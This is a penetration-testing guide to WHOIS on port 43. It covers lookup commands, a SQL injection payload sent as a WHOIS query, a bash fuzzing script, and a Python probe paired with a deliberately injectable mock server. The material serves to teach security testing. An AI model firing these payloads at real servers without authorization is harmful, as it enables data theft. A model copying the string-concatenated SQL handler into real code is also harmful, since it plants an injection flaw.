WHOIS - Port 43
Basic Information
WHOIS (RFC 3912) is a simple text protocol used to query registries for information about the holders of Internet resources: domain names, IP address blocks and autonomous system numbers. The client opens a TCP connection to port 43, sends a single query line terminated by CRLF, and the server answers with free-form text and closes the connection. Because the reply typically includes registrant names, contact details, name servers and netblock ownership, WHOIS lookups are a routine information-gathering step during a penetration test.
Default port: 43
PORT STATE SERVICE
43/tcp open whois
Enumerating WHOIS
To begin WHOIS enumeration, query a WHOIS server for everything it holds on a domain (the default port is 43; specify it explicitly when the service runs elsewhere):
whois -h <HOST> -p <PORT> "domain.tld"
Alternatively, because the protocol is just one query line followed by the server's reply, netcat does the same job. Note that echo terminates the line with a bare LF; RFC 3912 specifies CRLF, which almost every server tolerates, but a strict implementation may need the query sent with printf and an explicit \r\n:
echo "domain.tld" | nc -vn <HOST> <PORT>
Database Information
Some WHOIS daemons identify their backend in the banner or in the reply (a database name, product or version string). That is worth noting for further enumeration, and it points at a more interesting property: the query line is usually used as a lookup key in a SQL database. If the server builds its statement by concatenating the query text into it, the WHOIS query is a SQL injection vector in exactly the same way a web parameter is.
Using the following query:
whois -h <Victim_ip> -p 43 "a') or 1=1#"
The payload closes the quoted string and the enclosing parenthesis, appends a tautology, and comments out the remainder of the statement (# is a MySQL comment; use "-- " for PostgreSQL or SQLite backends). If the server is vulnerable, the reply either contains every row in the table instead of the single matching record, or a database error message when the syntax does not fit its backend. Either outcome shows that the input reaches the query unescaped, so treat WHOIS as a candidate SQL injection vector whenever you test one.
Script to automate SQLi probing with a wordlist:
#!/bin/bash
# Variables
HOST="10.10.10.10"   # Change to the target IP
PORT="43"            # Default WHOIS port
WORDLIST="/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt" # Path to your SQLi wordlist
# Check if wordlist exists
if [[ ! -f "$WORDLIST" ]]; then
    echo "Wordlist not found: $WORDLIST"
    exit 1
fi
# Loop through each payload in the wordlist, skipping empty lines
while IFS= read -r payload; do
    [[ -z "$payload" ]] && continue
    echo "Testing with payload: $payload"
    # Perform the WHOIS request with the current payload. "--" stops the whois
    # client from parsing payloads that begin with "-" as command-line options,
    # and 2>&1 keeps client-side errors (connection refused, timeouts) visible.
    response=$(whois -h "$HOST" -p "$PORT" -- "$payload" 2>&1)
    # Check the response for SQLi indicators (extend the pattern for the target's backend)
    if echo "$response" | grep -qi "syntax error\|unexpected"; then
        echo "Possible SQLi detected with payload: $payload"
        echo "Response: $response"
        echo "-------------------------------------------"
    fi
done < "$WORDLIST"
echo "SQLi test completed."
Make the script executable:
chmod +x whois-sqli-tester.sh
./whois-sqli-tester.sh
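The following Python script is an added example, not code from the original page. It ties together the two procedures above: it implements the raw RFC 3912 exchange (one query line, CRLF, read until the server closes) that the whois and netcat commands perform, and it probes a server with the injection payloads while comparing each reply to a benign baseline instead of only grepping for error strings. So that it runs offline it also includes a constructed, deliberately injectable mock WHOIS server backed by an in-memory SQLite table. The loopback address, the table contents, the payload list, the error-pattern list and the "more than twice the baseline" threshold are all assumptions made for the demonstration.

```python
#!/usr/bin/env python3
"""WHOIS (RFC 3912) client plus a baseline-aware SQL injection probe.

Added example. The mock server at the bottom is a constructed, intentionally
vulnerable stand-in so the script runs offline; point whois_query()/probe()
at a real host:port to test a live service.
"""
import re
import socket
import socketserver
import sqlite3
import threading

CRLF = b"\r\n"


def whois_query(host, port, query, timeout=10.0):
    """RFC 3912 exchange: connect over TCP, send one query line terminated by
    CRLF, read until the server closes the connection, return the text."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(query.encode("utf-8", "replace") + CRLF)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")


# Error fragments typical of MySQL, PostgreSQL and SQLite (assumed list; extend per target).
SQL_ERROR_RE = re.compile(
    r"syntax error|unexpected|sql syntax|near '|unrecognized token|"
    r"unterminated quoted string|operationalerror|pg_query",
    re.IGNORECASE,
)


def classify(baseline, response):
    """Indicators that a payload reached the backend query unescaped.

    'sql-error'    : a database error string that the benign baseline lacks
    'size-anomaly' : the reply is more than twice the baseline, as a
                     tautology (OR 1=1) that widens the WHERE clause would do
    The 2x threshold is an assumption; tune it per target."""
    hits = []
    if SQL_ERROR_RE.search(response) and not SQL_ERROR_RE.search(baseline):
        hits.append("sql-error")
    if len(response) > 2 * max(len(baseline), 1):
        hits.append("size-anomaly")
    return hits


def probe(host, port, benign, payloads):
    """Query a benign value once for a baseline, then each payload; return
    {payload: [indicators]} for the payloads that produced any indicator."""
    baseline = whois_query(host, port, benign)
    findings = {}
    for payload in payloads:
        hits = classify(baseline, whois_query(host, port, payload))
        if hits:
            findings[payload] = hits
    return findings


# The page's MySQL-style payload plus the "-- " comment variant for SQLite/PostgreSQL.
PAYLOADS = ["a') or 1=1#", "a') or 1=1-- "]


# ---- Constructed mock WHOIS server (deliberately injectable, demo only) ----
class _VulnerableWhoisHandler(socketserver.StreamRequestHandler):
    def handle(self):
        query = self.rfile.readline().decode("utf-8", "replace").rstrip("\r\n")
        # Deliberate bug: the query line is concatenated straight into the SQL.
        sql = "SELECT domain, registrant FROM domains WHERE (domain = '%s')" % query
        try:
            rows = self.server.db.execute(sql).fetchall()
            body = "\n".join("Domain: %s\nRegistrant: %s" % row for row in rows) or "No match"
        except sqlite3.Error as exc:
            body = "Error: %s" % exc  # leaks the backend error, as careless servers do
        self.wfile.write(body.encode("utf-8") + CRLF)


def start_mock_server():
    """Start the mock server on an ephemeral loopback port; return (server, port)."""
    db = sqlite3.connect(":memory:", check_same_thread=False)  # handler runs in another thread
    db.execute("CREATE TABLE domains (domain TEXT, registrant TEXT)")
    db.executemany("INSERT INTO domains VALUES (?, ?)", [
        ("example.com", "Alice Example"),  # constructed sample data
        ("example.org", "Bob Example"),
        ("example.net", "Carol Example"),
    ])
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _VulnerableWhoisHandler)
    server.db = db
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_mock_server()
    try:
        for payload, hits in probe("127.0.0.1", port, "example.com", PAYLOADS).items():
            print("%r -> %s" % (payload, ", ".join(hits)))
    finally:
        server.shutdown()
        server.server_close()
```

Run as-is and both payloads are flagged against the mock: the "#" variant trips the SQLite tokenizer and is reported as sql-error, while the "-- " variant comments out the closing quote and returns every row, which shows up as size-anomaly. Against a real target, call probe(host, 43, "<a domain the server knows>", payloads) with the Generic-SQLi.txt list from the script above. Comparing against a baseline matters because many WHOIS servers answer any unknown query with a help or "no match" text containing the word "error", which a plain grep misreports as injection.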